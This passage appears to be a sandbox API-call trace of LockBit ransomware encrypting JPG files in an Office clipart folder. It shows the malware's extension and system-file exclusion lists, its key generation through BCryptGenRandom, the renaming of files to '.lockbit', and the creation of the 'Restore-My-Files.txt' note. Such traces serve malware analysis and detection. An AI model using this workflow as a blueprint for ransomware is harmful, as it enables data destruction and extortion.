returned 1 [0143.649] lstrcmpiW (lpString1=".", lpString2="J0145669.JPG") returned -1 [0143.649] lstrcmpiW (lpString1="..", lpString2="J0145669.JPG") returned -1 [0143.649] PathFindExtensionW (pszPath="J0145669.JPG") returned=".JPG" [0143.649] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.649] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.649] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.649] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.649] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.649] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.649] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.649] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.649] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0143.650] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.650] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.651] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.651] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.651] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.651] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.651] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.651] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.651] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.651] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.651] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.651] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145669.JPG") returned 1 [0143.651] lstrcmpiW (lpString1="ntldr", lpString2="J0145669.JPG") returned 1 [0143.651] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145669.JPG") returned 1 [0143.651] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145669.JPG") returned -1 [0143.651] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145669.JPG") returned -1 [0143.651] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145669.JPG") returned 1 [0143.651] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145669.JPG") returned -1 [0143.651] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.651] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned=".JPG" [0143.651] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.651] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.652] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.652] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.653] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.653] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.653] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.653] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0143.653] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG.lockbit") returned 72 [0143.653] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0143.654] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.654] malloc (_Size=0x40068) returned 0x3d70450 [0143.654] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=31850) returned 1 [0143.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0143.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0143.655] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0143.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.660] malloc (_Size=0xa6) returned 0x77d7a8 [0143.660] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.661] free (_Block=0x77d7a8) [0143.661] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.662] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.662] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.662] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a05b300, ftCreationTime.dwHighDateTime=0x1bdbf72, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1a05b300, ftLastWriteTime.dwHighDateTime=0x1bdbf72, nFileSizeHigh=0x0, nFileSizeLow=0x8fd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145707.JPG", cAlternateFileName="")) returned 1 [0143.662] lstrcmpiW (lpString1=".", lpString2="J0145707.JPG") returned -1 [0143.662] lstrcmpiW (lpString1="..", lpString2="J0145707.JPG") returned -1 [0143.662] PathFindExtensionW (pszPath="J0145707.JPG") returned=".JPG" [0143.662] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.662] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.662] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.662] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.662] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.662] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.662] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.662] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.662] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.662] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.662] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.662] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.663] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.663] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0143.664] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.664] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.664] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.664] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.664] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.664] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.664] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145707.JPG") returned 1 [0143.665] lstrcmpiW (lpString1="ntldr", lpString2="J0145707.JPG") returned 1 [0143.665] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145707.JPG") returned 1 [0143.665] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145707.JPG") returned -1 [0143.665] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145707.JPG") returned -1 [0143.665] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145707.JPG") returned 1 [0143.665] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145707.JPG") returned -1 [0143.665] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.665] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned=".JPG" [0143.665] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.665] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.665] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.665] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.666] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.666] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.666] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.666] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0143.666] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG.lockbit") returned 72 [0143.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0143.667] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.667] malloc (_Size=0x40068) returned 0x3e70008 [0143.667] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=36820) returned 1 [0143.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0143.668] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0143.669] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0143.762] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.762] malloc (_Size=0xa6) returned 0x77d7a8 [0143.762] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.763] free (_Block=0x77d7a8) [0143.764] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.764] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.764] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.764] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50dbc900, ftCreationTime.dwHighDateTime=0x1bdbf72, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50dbc900, ftLastWriteTime.dwHighDateTime=0x1bdbf72, nFileSizeHigh=0x0, nFileSizeLow=0x8fb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145810.JPG", cAlternateFileName="")) returned 1 [0143.764] lstrcmpiW (lpString1=".", lpString2="J0145810.JPG") returned -1 [0143.764] lstrcmpiW (lpString1="..", lpString2="J0145810.JPG") returned -1 [0143.764] PathFindExtensionW (pszPath="J0145810.JPG") returned=".JPG" [0143.764] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.764] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.764] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.764] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.764] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.764] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.764] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.764] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.764] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.764] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.764] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.764] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.765] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.765] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0143.766] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.766] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.766] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.766] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.766] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.766] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.766] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145810.JPG") returned 1 [0143.766] lstrcmpiW (lpString1="ntldr", lpString2="J0145810.JPG") returned 1 [0143.766] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145810.JPG") returned 1 [0143.766] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145810.JPG") returned -1 [0143.766] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145810.JPG") returned -1 [0143.766] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145810.JPG") returned 1 [0143.766] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145810.JPG") returned -1 [0143.766] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.766] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned=".JPG" [0143.766] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.767] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.767] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.768] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.768] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.768] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.768] lstrcmpiW (lpString1=".tmd", 